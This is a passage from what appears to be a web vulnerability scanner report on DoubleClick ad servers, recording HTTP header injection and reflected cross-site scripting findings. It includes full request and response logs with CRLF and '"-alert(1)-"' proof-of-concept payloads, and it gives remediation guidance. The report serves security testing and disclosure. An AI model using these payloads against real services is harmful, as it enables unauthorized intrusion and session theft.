Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67566
9102e73c4e/invprod.nasdaq.com/heatmap_n100;tile=1;;abr=!webtv;key=value;sz=728x90;ord={53870897507295016}:
Date: Sun, 13 Feb 2011 02:12:53 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3309e%0d%0a28a7430a9db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3309e%0d%0a28a7430a9db/mktsnews.nasdaq.com/;tile=3;;abr=!webtv;key=value;sz=160x600;ord=%7B914398350287228800%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3309e
28a7430a9db/mktsnews.nasdaq.com/;tile=3;;abr=!webtv;key=value;sz=160x600;ord={914398350287228800}:
Date: Sun, 13 Feb 2011 01:44:36 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 60be2%0d%0ab7c112e9940 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60be2%0d%0ab7c112e9940/mktsnews.nasdaq.com/headlines;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B474336534040048700%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60be2
b7c112e9940/mktsnews.nasdaq.com/headlines;tile=1;;abr=!webtv;key=value;sz=728x90;ord={474336534040048700}:
Date: Sun, 13 Feb 2011 01:44:25 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8ad%0d%0a53052c40e2c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1c8ad%0d%0a53052c40e2c/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord=%7B970103129278868500%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1c8ad
53052c40e2c/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord={970103129278868500}:
Date: Sun, 13 Feb 2011 01:44:21 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2b480%0d%0acc9c9de795d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2b480%0d%0acc9c9de795d/quotes.nasdaq.com/icu_oh;tile=8;;abr=!webtv;key=value;sz=980x20;ord=%7B477519980166107400%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/asp/summaryquote.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b480
cc9c9de795d/quotes.nasdaq.com/icu_oh;tile=8;;abr=!webtv;key=value;sz=980x20;ord={477519980166107400}:
Date: Sun, 13 Feb 2011 02:09:56 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1cb77%0d%0aa181f422140 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1cb77%0d%0aa181f422140/quotes.nasdaq.com/news;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B152704885229468350%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/investing/tools.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1cb77
a181f422140/quotes.nasdaq.com/news;tile=1;;abr=!webtv;key=value;sz=728x90;ord={152704885229468350}:
Date: Sun, 13 Feb 2011 02:15:21 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 35d75%0d%0acbe4cac2745 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /35d75%0d%0acbe4cac2745/researchtools.nasdaq.com/;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B572679921519011260%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/investing/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/35d75
cbe4cac2745/researchtools.nasdaq.com/;tile=1;;abr=!webtv;key=value;sz=728x90;ord={572679921519011260}:
Date: Sun, 13 Feb 2011 02:15:43 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 32a9f%0d%0a253ddecce29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /32a9f%0d%0a253ddecce29/researchtools.nasdaq.com/wide;tile=3;;abr=!webtv;key=value;sz=120x600;ord=%7B530307983746752100%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/32a9f
253ddecce29/researchtools.nasdaq.com/wide;tile=3;;abr=!webtv;key=value;sz=120x600;ord={530307983746752100}:
Date: Sun, 13 Feb 2011 02:16:38 GMT
Server: GFE/2.0
<h1>Error 302 Moved Temporarily</h1>
2. Cross-site scripting (reflected)
There are 96 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fcfd"-alert(1)-"48722aee232 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=3fcfd"-alert(1)-"48722aee232 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7326
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 18:03:31 GMT
Expires: Sun, 13 Feb 2011 18:03:31 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... GVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=3fcfd"-alert(1)-"48722aee232http://www.enterpriseholdings.com/about-us/business-rental?utm_source=Google+utm_medium=Online&utm_campaign=Business_Rental"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque" ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26424"-alert(1)-"c0d4af949 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ26424"-alert(1)-"c0d4af949&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 18:01:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7372
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... r6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ26424"-alert(1)-"c0d4af949&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_cam ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa483"-alert(1)-"b7925e3d8fc was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912fa483"-alert(1)-"b7925e3d8fc&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 18:02:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912fa483"-alert(1)-"b7925e3d8fc&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign%3DBusiness_Rental"); var fscUrl = url; var fscUrlClickTagFound = fal ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49520"-alert(1)-"e5636fe8811 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=149520"-alert(1)-"e5636fe8811&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 18:01:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... _wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=149520"-alert(1)-"e5636fe8811&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign% ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 419f5"-alert(1)-"d9e1c044134 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw419f5"-alert(1)-"d9e1c044134&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 